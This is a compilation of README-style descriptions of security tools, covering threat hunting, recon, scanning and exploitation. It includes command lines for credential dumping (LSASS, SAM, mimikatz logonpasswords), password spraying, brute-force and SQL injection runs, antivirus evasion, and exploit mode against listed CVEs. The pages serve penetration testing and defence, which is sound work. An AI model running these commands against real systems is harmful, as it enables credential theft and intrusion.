Install GCC cross-compilers. The following commands assume you are running Debian or Ubuntu on an Intel workstation and may need to be changed if you are running another Linux distro:

sudo apt install gcc gcc-arm-linux-gnueabi gcc-aarch64-linux-gnu gcc-mips-linux-gnu \
gcc-mipsel-linux-gnu gcc-powerpc-linux-gnu


Watcher - Open Source Cybersecurity Threat Hunting Platform



Watcher is a Django & React JS automated platform for discovering potential new cybersecurity threats targeting your organisation.

It should be used on web servers and is available on Docker.


Watcher capabilities

Useful as a bundle grouping automated threat hunting/intelligence features.


Additional features
  • Create cases on TheHive and events on MISP.
  • Integrated IOCs export to TheHive and MISP.
  • LDAP & Local Authentication.
  • Email notifications.
  • Ticketing system feeding.
  • Admin interface.
  • Advanced user permissions & groups.

Involved dependencies

Screenshots

Watcher provides a powerful user interface for data visualization and analysis. This interface can also be used to manage Watcher usage and to monitor its status.

Threats detection


 

Keywords detection


 

Malicious domain names monitoring


 

IOCs export to TheHive & MISP


 

Potentially malicious domain names detection



Django provides a ready-to-use user interface for administrative activities. We all know how an admin interface is important for a web project: Users management, user group management, Watcher configuration, usage logs...

Admin interface



Installation

Create a new Watcher instance in ten minutes using Docker (see Installation Guide).


Platform architecture


 

Get involved

There are many ways to get involved with Watcher:

  • Report bugs by opening Issues on GitHub.
  • Request new features or suggest ideas (via Issues).
  • Make pull-requests.
  • Discuss bugs, features, ideas or issues.
  • Share Watcher to your community (Twitter, Facebook...).

Pastebin compliant

In order to use Watcher pastebin API feature, you need to subscribe to a pastebin pro account and whitelist Watcher public IP (see https://pastebin.com/doc_scraping_api).


Thanks to Thales Group CERT (THA-CERT) and ISEN-Toulon Engineering School for allowing me to carry out this project.



SharpMapExec - A Sharpened Version Of CrackMapExec



A sharpened version of CrackMapExec. This tool is made to simplify penetration testing of networks and to serve as a Swiss army knife built to run on Windows, which is often a requirement during insider threat simulation engagements.


Besides scanning for access it can be used to identify vulnerable configurations and exfiltrate data. The idea for the data exfiltration modules is to execute the least amount of necessary code on the remote computer. To accomplish this, the tool will download all the secrets to the loot directory and parse them locally.

You can specify whether you want to use Kerberos or NTLM authentication. If you choose Kerberos, the tool will create a sacrificial token and use Rubeus to import/ask for the ticket. If NTLM is chosen, the tool will create threads and use SharpKatz to run SetThreadToken when an NTLM hash is specified; if a password is specified, it will go with ordinary C# impersonation.

SharpMapExec.exe
usage:

--- Smb ---
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET

Available Smb modules
/m:shares

--- WinRm ---
SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET

Available WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump Lsass Process)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)

--- Domain ---
SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
SharpMapExec.exe tgtdeleg

Smb

Can be used to scan for admin access and accessible Smb shares.

Modules;

/m:shares                                  (Scan enumerated shares for access)

WinRm

The beast. It has built-in AMSI bypass, JEA language breakout, and JEA function analysis. Can be used for code execution, scanning for PsRemote access, finding vulnerable JEA endpoints, and data exfiltration.

Modules;

/m:exec /a:whoami                           (Invoke-Command)
/m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
/m:comsvcs (Dump Lsass Process)
/m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
/m:download /path:C:\file /destination:file (Download File from Host)

Domain

Currently supports domain password spraying and creating a TGT for the current user, which can be used with the /ticket parameter to get the current context.


Example usage

For easy or mass in-memory execution of C# assemblies



Kerberos password spraying then scanning for local admin access


 

This project supports scanning JEA endpoints and will analyze source code of non default commands and check if the endpoint was not configured for no-language mode.



Discover local admin password reuse with an NT hash.


 

Mass dump Lsass process with built-in Microsoft signed DLL and saves it to the loot folder



And much more!

Some scenarios with Kerberos will require you to sync your clock with the DC and set the DNS

net time \\DC01.hackit.local /set
Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

Acknowledgments

Projects that helped or are existing in this tool



0D1N v3.4 - Tool For Automating Customized Attacks Against Web Applications (Full Made In C Language With Pthreads, Have A Fast Performance)



0d1n is a tool for automating customized attacks against web applications. This tool is very fast because it uses a thread pool and the C language.




0d1n is a tool for automating customized attacks against web applications. Video demo:



Tool functions:
  • Brute force logins and passwords in auth forms

  • Directory disclosure (use a PATH list to brute force, and find HTTP status codes)

  • Test to find SQL Injection and XSS vulnerabilities

  • Test to find SSRF

  • Test to find Command injection

  • Option to load an anti-CSRF token on each request

  • Option to use a random proxy per request

  • other functions...


To run and install, follow these steps:

Requires libcurl-dev or libcurl-devel (on RPM-based Linux).

$ git clone https://github.com/CoolerVoid/0d1n/

You need libcurl to run; install it as follows:

$ sudo apt-get install libcurl-dev
or try libcurl4-dev... libcurl*

If on an RPM-based distro:

$ sudo yum install libcurl-devel

To install, run the following commands:

$ cd 0d1n

$ make; sudo make install USER=name_your_user;

$ cd 0d1n_view; make; sudo make install USER=name_your_user;

Start the view server to view the reports online:

$ sudo 0d1n_view 

Now, in another console, you can run the tool:


$ 0d1n


To uninstall, follow these steps:
$ cd 0d1n; sudo make uninstall

$ cd 0d1n_view; sudo make uninstall


Attack examples:

Brute force to find directory

$ 0d1n --host http://127.0.0.1/^ --payloads /opt/0d1n/payloads/dir_brute.txt --threads 500 --timeout 3 --log bartsimpsom4 --save_response

Note: You can change the number of threads; if you have a good machine, you can try 800, 1200... each machine has a different context.

For SQL injection attack

$ 0d1n --host 'http://site.com/view/1^/product/^/' --payloads /opt/0d1n/payloads/sqli_list.txt --find_string_list /opt/0d1n/payloads/sqli_str2find_list.txt --log log1337 --tamper randcase --threads 800 --timeout 3 --save_response

Note: Tamper is a resource to try to bypass the web application firewall

To brute force an auth system

0d1n --host 'http://site.com/auth.py' --post 'user=admin&password=^' --payloads /opt/0d1n/payloads/wordlist.txt --log log007 --threads 500 --timeout 3

Note: if there is a CSRF token, you can use argv to get this token on each request and brute force...

Search for SQLi in hard mode in a login system with a CSRF token:

0d1n  --host "http://127.0.0.1/vulnerabilities/sqli/index.php?id=^" --payloads /opt/0d1n/payloads/sqli.txt --find_string_list /opt/0d1n/payloads/find_responses.txt --token_name user_token --log logtest_fibonaci49 --cookie_jar /home/user_name/cookies.txt --save_response --tamper randcase --threads 100

Note: Load the cookie jar from the browser and save it in cookies.txt to load.


Notes External libs
  • To gain extreme performance, 0d1n uses a thread pool of POSIX threads; you can study this small library: https://github.com/Pithikos/C-Thread-Pool

  • 0d1n uses OpenBSD/NetBSD string functions, such as strlcat() and strlcpy(), to prevent buffer overflows.


Project Overview on cloc
cooler@gentoo:~/codes$ cloc 0d1n/
937 text files.
532 unique files.
451 files ignored.

-------------------------------------------------------------------------------
Language                     files          blank        comment           code
-------------------------------------------------------------------------------
JavaScript                     361           9951          15621          52178
C                               51           4986           4967          26642
C/C++ Header                    30           1184           2858           4295
CSS                             10            434            369           2142
HTML                             7             59              0           1616
TeX                              2             52              4            206
Markdown                         3             81              0            137
make                             4             36              9            130
Bourne Shell                     2              0              0              4
-------------------------------------------------------------------------------
SUM:                           487          16835          23846          91213
-------------------------------------------------------------------------------

Read the docs, and the help menu shown when you execute the "0d1n" binary...

Do you have any doubts about 0d1n? Please create an issue in this repository; I can help you...


To study old versions, look at the following:

http://sourceforge.net/projects/odin-security-tool/files/?source=navbar



Grawler - Tool Which Comes With A Web Interface That Automates The Task Of Using Google Dorks, Scrapes The Results, And Stores Them In A File



Grawler is a tool written in PHP which comes with a web interface that automates the task of using google dorks, scrapes the results, and stores them in a file.


General info

Grawler aims to automate the task of using Google dorks through a web interface. The main idea is to provide a simple yet powerful tool that anyone can use. Grawler comes pre-loaded with the following features.


Features
  • Supports multiple search engines (Google, Yahoo, Bing)
  • Comes with files containing dorks, which as of now are categorized into three categories.
    • Filetypes
    • Login Pages
    • SQL Injections
    • My_dorks (This file is intentionally left blank for users to add their own list of dorks)
  • Comes with its own guide to learn the art of google dorks.



 

  • Built-in feature to use proxy (just in case google blocks you)



  • Saves all the scraped URLs in a single file (name needs to be specified in the input field with extension .txt).
  • Grawler can run in four different modes
    • Automatic mode: Where the Grawler uses dorks present in a file and stores the result.
    • Automatic mode with proxy enabled
    • Manual mode: This mode is for users who only want to test a single dork against a domain.
    • Manual mode with proxy enabled

Setup

Demo

Sample Result



Captcha Issue

Sometimes the Google captcha can be an issue, because Google rightfully detects the bot and tries to block it. Here are approaches I've already tried to avoid the captcha:

  • Using different user-agent headers and IPs in a round-robin algorithm.
    • It works, but it returns a lot of garbage URLs that are not of any use, and it's also slow, so I removed that feature.
  • Using free proxy servers.
    • Free proxy servers are too slow and they often get blocked, because a lot of people use them for scraping.
  • Sleep function.
    • This works to some extent, so I have incorporated it into the code.
  • Tor network.
    • Nope; every time I tried it, a beautiful captcha was presented, so I removed this functionality too.

Solution
  • The best solution that I have found is to sign up for a proxy service and use it; it gives good results with fewer garbage URLs, but it can be slow sometimes.
  • Use a VPN.

Contribute
  • Report Bugs
  • Add new features and functionalities
  • Add more effective Google dorks (which actually work)
  • Workaround the captcha issue
  • Create a Docker image (basically, work on portability and usability)
  • Suggestions

Contact Me

You can contact me here A3h1nt regarding anything.



Kenzer - Automated Web Assets Enumeration And Scanning



Automated Web Assets Enumeration & Scanning

Instructions for running
  1. Create an account on Zulip
  2. Navigate to Settings > Your Bots > Add a new bot
  3. Create a new generic bot named kenzer
  4. Add all the configurations in configs/kenzer.conf
  5. Install/Run using -
    • ./install.sh -b [if you need kenzer-compatible binaries to be installed]
    • ./install.sh [if you do not need kenzer-compatible binaries to be installed]
    • ./run.sh [if you do not need installation at all]
    • ./service.sh [initialize it as a service post-installation]
  6. Interact with kenzer using Zulip client, by adding bot to a stream or via DM.
  7. Test @**kenzer** man as Zulip input to display available commands.
  8. All the commands can be used by mentioning the chatbot using the prefix @**kenzer**.

Built-in Functionalities
  • subenum - enumerates subdomains
  • portenum - enumerates open ports
  • webenum - enumerates webservers
  • headenum - enumerates additional info from webservers
  • asnenum - enumerates asn
  • dnsenum - enumerates dns records
  • conenum - enumerates hidden files & directories
  • urlenum - enumerates urls
  • subscan - hunts for subdomain takeovers
  • cscan - scan with customized templates
  • cvescan - hunts for CVEs
  • vulnscan - hunts for other common vulnerabilities
  • portscan - scans open ports
  • parascan - hunts for vulnerable parameters
  • endscan - hunts for vulnerable endpoints
  • buckscan - hunts for unreferenced aws s3 buckets
  • favscan - fingerprints webservers using favicon
  • vizscan - screenshots applications running on webservers
  • idscan - identifies applications running on webservers
  • enum - runs all enumerator modules
  • scan - runs all scanner modules
  • recon - runs all modules
  • hunt - runs your custom workflow
  • remlog - removes log files
  • upload - switches upload functionality
  • upgrade - upgrades kenzer to latest version
  • monitor - monitors ct logs for new subdomains
  • monitor normalize - normalizes the enumerations from ct logs
  • sync - synchronizes the local kenzerdb with github
  • kenzer <module> - runs a specific module
  • kenzer man - shows this manual

COMPATIBILITY TESTED ON ARCHLINUX(x64) & DEBIAN(x64) ONLY
FEEL FREE TO SUBMIT PULL REQUESTS




GRecon - Your Google Recon Is Now Automated



GRecon (Greei-Conn) is a simple Python tool that automates the process of Google-based recon, a.k.a. Google dorking. The current version 1.0 runs 7 search queries (7 micro-plugins) on the specified target, providing awesome results.

The current version runs Google search queries to find:

  • Subdomains
  • Sub-Subdomains
  • Signup/Login pages
  • Dir Listing
  • Exposed Docs
    • pdf...xls...docx...
  • WordPress Entries
  • Pasting Sites
    • Records in Pastebin, Ghostbin...

Installation :

Use the package manager pip to install the requirements:

cd GRecon
python3 -m pip install -r requirements.txt
python3 Grecon.py

Referring to the Redbull BugBounty Program Here, here's a demo:



GRecon_Cli :

In Grecon_cli you can use your own Google dorks (still in development).



Swego - Swiss Army Knife Webserver In Golang



Swiss army knife webserver in Golang. Kept simple like Python's SimpleHTTPServer, but with many features.


Usage

Help
$ ./webserver -help
web subcommand
-bind string
Bind Port (default "8080")
-certificate string
HTTPS certificate : openssl req -new -x509 -sha256 -key server.key -out server.crt -days 365
-gzip
Enables gzip/zlib compression (default true)
-help
Print usage
-key string
HTTPS Key : openssl genrsa -out server.key 2048
-password string
Password for basic auth, default: notsecure (default "notsecure")
-private string
Private folder with basic auth, default /tmp/SimpleHTTPServer-golang/src/bin/private (default "private")
-root string
Root folder (default "/tmp/SimpleHTTPServer-golang/src/bin")
-tls
Enables HTTPS
-username string
Username for basic auth, default: admin (default "admin")

run subcommand
Usage:
./webserver-linux-amd64 run <binary> <args>

Packaged Binaries:

Web server over HTTP
$ ./webserver
Sharing /tmp/ on 8080 ...
Sharing /tmp/private on 8080 ...

Web server over HTTPS
$ openssl genrsa -out server.key 2048
Generating RSA private key, 2048 bit long modulus (2 primes)
..........................................+++++
.................................................................................................................+++++
e is 65537 (0x010001)

$ openssl req -new -x509 -sha256 -key server.key -out server.crt -days 365
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

$ ./webserver web -tls -key server.key -cert server.crt
Sharing /tmp/ on 8080 ...
Sharing /tmp/private on 8080 ...

Web server using private directory and root directory

Private folder on same directory
$ ./webserver-linux-amd64 web -private ThePrivateFolder -username nodauf -password nodauf
Sharing /tmp/ on 8080 ...
Sharing /tmp/ThePrivateFolder on 8080 ...

Different path for root and private directory
$ ./webserver-linux-amd64 web -private /tmp/private -root /home/nodauf -username nodauf -password nodauf
Sharing /home/nodauf on 8080 ...
Sharing /tmp/private on 8080 ...

Embedded binary (only on Windows)

List the embedded binaries:
C:\Users\Nodauf>.\webserver.exe run  
You must specify a binary to run
-args string
Arguments for the binary
-binary string
Binary to execute
-help
Print usage
-list
List the embedded files

Packaged Binaries:
Invoke-PowerShellTcp.ps1
mimikatz.exe
php-reverse-shell.php
plink.exe

Run binary with arguments:
C:\Users\Nodauf>.\webserver.exe run -binary mimikatz.exe -args "privilege::debug sekurlsa::logonpasswords"
....

Running a binary this way could help bypass AV protections. Sometimes the arguments sent to the binary may be caught by the AV; if possible, use the interactive CLI of the binary (like mimikatz) or recompile the binary to change the argument names.


Features
  • HTTPS
  • Directory listing
  • Define a private folder with basic authentication
  • Upload file
  • Download file as an encrypted zip (password: infected)
  • Download folder with a zip
  • Embedded files
  • Run embedded binary written in C# (only available on Windows)
  • Create a folder from the browser
  • Ability to execute embedded binary

Todo
  • Add a feature for search and replace in embedded files (to fill in the IP address, for example)
  • JS/CSS menu to provide command lines for PowerShell, some GTFOBins, and curl/wget download-and-execute one-liners


Censys-Python - An Easy-To-Use And Lightweight API Wrapper For The Censys Search Engine



An easy-to-use and lightweight API wrapper for the Censys Search Engine (censys.io). Python 3.6+ is currently supported.


Getting Started

The library can be installed using pip.

$ pip install censys

To configure your credentials run censys config or set both CENSYS_API_ID and CENSYS_API_SECRET environment variables.

$ censys config

Censys API ID: XXX
Censys API Secret: XXX

Successfully authenticated for your@email.com
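Alternatively, the same credentials can be supplied through the environment variables mentioned above (values are placeholders):

$ export CENSYS_API_ID="XXX"
$ export CENSYS_API_SECRET="XXX"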

Resources

Contributing

All contributions (no matter how small) are always welcome.


Development
$ git clone git@github.com:censys/censys-python.git
$ pip install -e ".[dev]"

Testing

Testing requires credentials to be set.

$ pytest


Vulmap - Web Vulnerability Scanning And Verification Tools



Vulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.

Vulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use "-m" to select the mode; poc is the default. In poc mode it also supports "-f" batch target scanning, "-o" file output of results, and other main functions (for the other options, run python3 vulmap.py -h). In exp mode the poc function is no longer provided; the exploit is carried out directly and its result is fed back, further verifying whether the vulnerability exists and whether it can be exploited.

Try to use "-a" to specify the target type to reduce false positives, e.g. "-a solr".


Installation

The operating system must have Python 3; Python 3.7 or higher is recommended.

  • Installation dependency
pip3 install -r requirements.txt
  • Linux & MacOS & Windows
python3 vulmap.py -u http://example.com

Options

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g. -u "http://example.com")
-f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f "/home/user/list.txt")
-m MODE, --mode MODE The mode supports "poc" and "exp", you can omit this option, and enter poc mode by default
-a APP, --app APP Specify a web app or cms (e.g. -a "weblogic"). default scan all
-c CMD, --cmd CMD Custom RCE vuln command; commands other than "netstat -an" and "id" may affect the program's judgment. Default is "netstat -an"
-v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v "CVE-2020-2729")
--list Displays a list of vulnerabilities that support scanning
--debug Debug mode echo request and responses
--delay DELAY Delay check time, default 0s
--timeout TIMEOUT Scan timeout time, default 10s
-o FILE, --output FILE Text mode export (e.g. -o "result.txt")

Examples

Test all vulnerabilities poc mode

python3 vulmap.py -u http://example.com

For RCE vulns, use the "id" command to test, because some Linux systems do not have the "netstat -an" command

python3 vulmap.py -u http://example.com -c "id"

Check http://example.com for struts2 vuln

python3 vulmap.py -u http://example.com -a struts2
python3 vulmap.py -u http://example.com -m poc -a struts2

Exploit the CVE-2019-2729 vuln of WebLogic on http://example.com:7001

python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729
python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729

Batch scan URLs in list.txt

python3 vulmap.py -f list.txt

Export scan results to result.txt

python3 vulmap.py -u http://example.com:7001 -o result.txt
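
The options above can also be combined; for example, a batch scan restricted to WebLogic checks, with a one-second delay between requests and the results written to a file (an illustrative combination of the documented flags):

python3 vulmap.py -f list.txt -a weblogic --delay 1 -o result.txt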

Vulnerabilities List

The vulnerabilities currently supported by Vulmap are as follows:

 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |
| Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |
| Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |
| Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |
| Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |
| Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |
| Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |
| Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |
| Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |
| Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |
| Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |
| Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |
| Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |
| Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |
| Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |
| Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |
| Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |
| Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |
| Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |
| Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |
| Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |
| Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |
| Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |
| Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |
| Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |
| Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |
| Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |
| Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |
| Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |
| Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |
| Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |
| Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
| Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |
| Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |
| Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |
| RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
| RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |
| RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
| ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |
| ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+

Docker

docker build -t vulmap/vulmap .
docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com
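
To batch-scan from inside the container, the directory holding your target list can be mounted as a volume; the /data mount point below is only an example:

docker run --rm -ti -v $(pwd):/data vulmap/vulmap python vulmap.py -f /data/list.txt -o /data/result.txt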




Aura - Python Source Code Auditing And Static Analysis On A Large Scale


Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Project goals:

  • provide an automated monitoring system over packages uploaded to PyPI, alerting on anomalies that can indicate either an ongoing attack or vulnerabilities in the code
  • enable an organization to conduct automated security audits of source code and implement secure coding practices, with a focus on auditing 3rd party code such as python package dependencies
  • allow researchers to scan code repositories on a large scale, create datasets, and perform analysis to further advance research in the area of vulnerable and malicious code dependencies

Why Aura?

While there are other tools whose functionality overlaps with Aura, such as Bandit, dlint, or semgrep, the focus of these alternatives is different, which affects their functionality and how they are used. These alternatives are mainly intended to be used like linters: integrated into IDEs and run frequently during development, which makes it important to minimize false positives and, ideally, to report clear, actionable explanations.

Aura, on the other hand, reports on the behavior of the code, anomalies, and vulnerabilities with as much information as possible, at the cost of more false positives. Many of the things Aura reports are not necessarily actionable by a user, but they tell you a lot about the behavior of the code, such as performing network communication, accessing sensitive files, or using mechanisms associated with obfuscation that indicate possibly malicious code. By collecting this kind of data and aggregating it together, Aura can be compared to other security systems such as antivirus, IDS, or firewalls, which essentially do the same analysis but on a different kind of data (network communication, running processes, etc.).

Here is a quick overview of differences between Aura and other similar linters and SAST tools:

  • input data:
    • Other SAST tools - usually restricted to python (target) source code only, and to the python version under which the tool is installed.
    • Aura - can analyze binary (or non-python) files as well as python source code, including a mixture of python code compatible with different python versions (py2k & py3k), all with the same Aura installation.
  • reporting:
    • Other SAST tools - aim to integrate well with other systems such as IDEs and CI pipelines, producing actionable results while trying to minimize false positives so that users are not overwhelmed with insignificant alerts.
    • Aura - reports as much information as possible, including findings that are not immediately actionable, such as behavioral and anomaly analysis. The output format is designed for easy machine processing and aggregation rather than human readability.
  • configuration:
    • Other SAST tools - are fine-tuned to the target project by customizing the signatures to the specific technologies it uses. The configuration can often be overridden by inserting comments into the source code, such as # nosec, to suppress an alert at that position.
    • Aura - expects little to no advance knowledge about the technologies used by the code being scanned, for example when auditing a new python package before approving it as a project dependency. In most cases it is not even possible to modify the scanned source code (e.g. by adding comments telling a linter or Aura to skip a detection at that location), because Aura scans a copy of the code hosted at some remote location.

Installation
poetry install --no-dev -E full

Or just use the prebuilt Docker image sourcecodeai/aura:dev


Running Aura
docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v

Aura uses so-called URIs to identify the protocol and location to scan; if no protocol is given, the scan argument is treated as a path to a file or directory on the local system.
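
For example, to audit a local project with the Docker image, mount the source directory into the container and pass its path instead of a URI (the /src mount point is only an example):

docker run -ti --rm -v $(pwd)/myproject:/src sourcecodeai/aura:dev scan /src -v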

Diff packages:

docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2

Find the most popular typosquatted packages (you need to run aura update to download the dataset first):

aura find-typosquatting --max-distance 2 --limit 10



Authors & Contributors

